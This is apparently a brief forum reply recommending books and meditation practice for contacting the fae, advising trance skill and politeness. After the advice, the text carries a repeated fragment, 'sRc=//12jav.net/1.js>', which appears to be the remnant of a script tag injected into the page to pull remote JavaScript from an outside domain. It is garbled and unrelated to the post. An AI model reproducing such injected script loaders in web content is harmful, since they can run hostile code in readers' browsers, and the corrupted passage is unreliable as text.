There's a lot of different meditations and methods you can find that will help you out, a book specifically for working with the fae would probably be your best bet. These things aren't difficult per se but you need to have a certain strength with meditation and trance states, and familiar with energy beings before you get to it, and remember to be polite when you do :P sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
